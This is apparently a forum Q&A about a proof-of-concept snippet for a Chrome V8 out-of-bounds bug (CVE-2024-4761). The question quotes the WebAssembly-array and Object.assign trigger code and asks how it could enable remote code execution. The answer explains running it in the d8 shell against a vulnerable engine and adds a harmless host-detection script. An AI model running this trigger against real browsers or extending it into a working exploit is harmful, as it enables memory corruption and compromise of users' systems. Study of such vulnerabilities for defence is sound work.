Guide to developing and showcasing a proof of concept (PoC) for a Google Chrome out-of-bounds (OOB) vulnerability

While reading through an article discussing the proof of concept of a CVE in Google Chrome (an OOB issue), I came across this intriguing code snippet (https://medium.com/@elniak/cve-2024-4761-exploiting-chromes-javascript-engine-highly-exploited-poc-presented-dcf9cab95c00):

const prefix = "...";
d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);
let builder = new WasmModuleBuilder();
let array = builder.addArray(kWasmI32, true);
builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef]))
  .addBody([
    kExprLocalGet, 0,
    kGCPrefix, kExprArrayNewDefault, array,
    kGCPrefix, kExprExternConvertAny,
  ])
  .exportFunc();
/*
builder.addFunction('set', makeSig([kWasmExternRef, kWasmI32, kWasmI32], []))
  .addBody([
    kExprLocalGet, 0,
    kGCPrefix, kExprAnyConvertExtern,
    kGCPrefix, kExprRefCastNull, array,
    kExprLocalGet, 1,
    kExprLocalGet, 2,
    kGCPrefix, kExprArraySet, array,
  ])
  .exportFunc();
*/
let instance = builder.instantiate({});
let wasm = instance.exports;
let array42 = wasm.createArray(42);
// %DebugPrint(array42);
let src = {};
src.a = 1;
delete src.a;
for (let i = 0; i < 1024; i++) {
  src[`p${i}`] = 1;
}

// %DebugPrint(src);
// %SetDataProperties(array42, src);
Object.assign(array42, src);

It seems to be JavaScript code.

How can I test and see the functionality of this code snippet?

I attempted saving it as a .js file and opening it in my Chrome browser (App version 110.80)

No luck so far. I'm unsure of how it could potentially pose harm or enable Remote Code Execution. I am seeking more insights on how this code snippet could be exploited.

This is solely for educational purposes.

Answer №1

Cautionary Note to Consider

If you are not well-versed in understanding the functionality of code obtained from an untrusted source through thorough examination, it is strongly advised that you refrain from executing it altogether.

This advice holds especially true when dealing with snippets provided in relation to security vulnerabilities, as there is a higher likelihood of encountering unexpected issues or consequences.

In the case of this particular Proof of Concept (PoC), be prepared for potential system instability due to its capability to write to various memory locations without restrictions.


How to demonstrate the working of this code snippet?

The code snippet you wish to test makes reference to a global variable known as d8, indicating that it is intended for use with the d8 command-line developer tool for the V8 engine.

Once you have installed d8 on your local machine (and have a vulnerable version of the V8 engine as required by the CVE mentioned), you can save the snippet to a file and execute it using d8 like any other command line program, for example: d8 script.js.
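As an added illustration of the point made in this answer (this is not code from the question, the answer, or the linked article), the probe below reports which JavaScript host a script is running under and lists the d8-only facilities a snippet depends on. The `d8` global (with `d8.file.execute`) and the `%`-prefixed runtime functions, which d8 only accepts with its `--allow-natives-syntax` flag, do not exist in a browser page or in Node.js, which is why loading the file in Chrome did nothing. The function names `detectHost` and `d8Dependencies` and the sample script text are my own constructions.

```javascript
// Added example: identify the JavaScript host a script is running under and
// list the d8-only facilities a script text relies on.

// Returns one of 'd8', 'browser', 'node', or 'unknown'. `g` defaults to the
// real global object; a plain object can be passed in to simulate a host.
function detectHost(g = globalThis) {
  if (typeof g.d8 === 'object' && g.d8 !== null && g.d8.file &&
      typeof g.d8.file.execute === 'function') {
    return 'd8';
  }
  if (typeof g.window === 'object' && typeof g.document === 'object') {
    return 'browser';
  }
  if (typeof g.process === 'object' && g.process !== null &&
      g.process.versions && typeof g.process.versions.node === 'string') {
    return 'node';
  }
  return 'unknown';
}

// Scans script text for constructs that only work in the d8 shell and returns
// their names, so a reader can see at a glance why the script cannot run in a
// browser. Commented-out %Native(...) calls are reported too, since they
// signal that the script expects d8 with --allow-natives-syntax.
function d8Dependencies(source) {
  const deps = [];
  if (/\bd8\.file\.execute\s*\(/.test(source)) deps.push('d8.file.execute');
  if (/\bWasmModuleBuilder\b/.test(source)) deps.push('wasm-module-builder.js');
  if (/(^|\/\/\s*)%[A-Za-z]+\s*\(/m.test(source)) {
    deps.push('%natives (--allow-natives-syntax)');
  }
  return deps;
}

// Constructed sample: the opening lines of a d8-style test script.
const sample = `const prefix = "...";
d8.file.execute(\`\${prefix}/test/mjsunit/wasm/wasm-module-builder.js\`);
let builder = new WasmModuleBuilder();
// %DebugPrint(builder);
`;

console.log('host:', detectHost());
console.log('d8-only dependencies:', d8Dependencies(sample));
```

Run under Node.js it reports `host: node`; pasted into a browser console it reports `browser`; only under d8 does it report `d8`, and only there would the listed dependencies resolve.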
